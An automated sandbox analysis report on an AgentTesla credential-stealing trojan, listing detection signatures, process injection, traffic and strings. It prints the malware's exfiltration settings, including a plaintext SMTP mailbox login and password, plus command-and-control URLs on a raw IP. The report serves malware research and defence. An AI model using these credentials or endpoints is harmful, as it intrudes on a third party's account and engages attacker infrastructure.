Windows Analysis Report W7UbgU8x18

Overview

General Information

Sample Name: W7UbgU8x18 (renamed file extension from none to exe)
Analysis ID: 528611
MD5: 01f140fea9669403791fb89c47138d69
SHA1: c4278cf25da52adc05f4d2161a11c7b96928ccea
SHA256: f135fdb20bb785afb947173d0bbfdfedd1ce5b8c4907f6aa37e9a9a706d8a1db
Tags: 32, AgentTesla, exe, trojan

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • W7UbgU8x18.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\W7UbgU8x18.exe" MD5: 01F140FEA9669403791FB89C47138D69)
    • conhost.exe (PID: 1768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • aspnet_regbrowsers.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
    • aspnet_regbrowsers.exe (PID: 4896 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe MD5: B490A24A9328FD89155F075FA26C0DEC)
    • WerFault.exe (PID: 6380 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "oazahotel@oazahotel.com.mk", "Password": "Oazah2020", "Host": "odin.mk-host.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
2.0.aspnet_regbrowsers.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.0.aspnet_regbrowsers.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.W7UbgU8x18.exe.3938940.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.W7UbgU8x18.exe.3938940.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
2.0.aspnet_regbrowsers.exe.400000.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 0.0.W7UbgU8x18.exe.3938940.7.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "oazahotel@oazahotel.com.mk", "Password": "Oazah2020", "Host": "odin.mk-host.com"}
Multi AV Scanner detection for submitted file
Source: W7UbgU8x18.exe, Virustotal: Detection: 35%
Source: W7UbgU8x18.exe, ReversingLabs: Detection: 28%
Machine Learning detection for sample
Source: W7UbgU8x18.exe, Joe Sandbox ML: detected
Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, Avira: Label: TR/Spy.Gen8
Source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, Avira: Label: TR/Spy.Gen8
Source: W7UbgU8x18.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: Binary string: D .pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbMZ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Core.pdbq source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbi source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Joe Sandbox View ASN Name: 24SHELLSUS 24SHELLSUS
                      Source: global traffic HTTP traffic detected: GET /token_ta992i.txt HTTP/1.1 Host: 194.85.248.219 Connection: Keep-Alive
                      Source: global traffic HTTP traffic detected: GET /publickey.txt HTTP/1.1 Host: 194.85.248.219
                      Source: global traffic HTTP traffic detected: GET /token_ta992i.txt HTTP/1.1 Host: 194.85.248.219
                      Source: global traffic HTTP traffic detected: GET /publickey.txt HTTP/1.1 Host: 194.85.248.219
                      Source: Joe Sandbox View IP Address: 209.205.200.74 209.205.200.74
                      Source: global traffic TCP traffic: 192.168.2.5:49817 -> 209.205.200.74:587
                      Source: unknownTCP traffic detected without corresponding DNS query: 194.85.248.219
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmpString found in binary or memory: http://194.85.248.219
                      Source: W7UbgU8x18.exe, 00000000.00000002.303457973.00000000028B2000.00000004.00000001.sdmpString found in binary or memory: http://194.85.248.219/publickey.txt
                      Source: W7UbgU8x18.exe, 00000000.00000000.256041961.0000000000BF9000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmpString found in binary or memory: http://194.85.248.219/token_ta992i.txt
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
                      Source: WerFault.exe, 0000000A.00000002.300722840.0000000004F20000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519418805.000000000354A000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000003.465831512.00000000011A4000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.519494646.0000000003588000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://m3kI8gc4jNB3oWFQtMC.org
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com01
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmpString found in binary or memory: http://odin.mk-host.com
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://sGexjS.com
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                      Source: W7UbgU8x18.exe, 00000000.00000002.303285101.0000000002881000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                      Source: WerFault.exe, 0000000A.00000003.282359280.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                      Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.519514145.000000000358E000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.520908081.0000000006CC0000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000002.516444584.00000000013E1000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, aspnet_regbrowsers.exe, 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: aspnet_regbrowsers.exe, 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: odin.mk-host.com
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      .NET source code contains very large array initializations
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, <PrivateImplementationDetails>{51F4FAD8-C68C-48D5-8048-B546FD1BA033}/BD7250DB-F98D-47A7-866C-6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, <PrivateImplementationDetails>{51F4FAD8-C68C-48D5-8048-B546FD1BA033}/BD7250DB-F98D-47A7-866C-6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, <PrivateImplementationDetails>{51F4FAD8-C68C-48D5-8048-B546FD1BA033}/BD7250DB-F98D-47A7-866C-6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.2.unpack, <PrivateImplementationDetails>{51F4FAD8-C68C-48D5-8048-B546FD1BA033}/BD7250DB-F98D-47A7-866C-6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.2.aspnet_regbrowsers.exe.400000.0.unpack, <PrivateImplementationDetails>{51F4FAD8-C68C-48D5-8048-B546FD1BA033}/BD7250DB-F98D-47A7-866C-6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: 2.0.aspnet_regbrowsers.exe.400000.4.unpack, <PrivateImplementationDetails>{51F4FAD8-C68C-48D5-8048-B546FD1BA033}/BD7250DB-F98D-47A7-866C-6BD9A3781D1C.csLarge array initialization: .cctor: array initializer size 11957
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilename vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuaAFllYGbTewxRVnYOHBNjJG.exe4 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.301512168.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
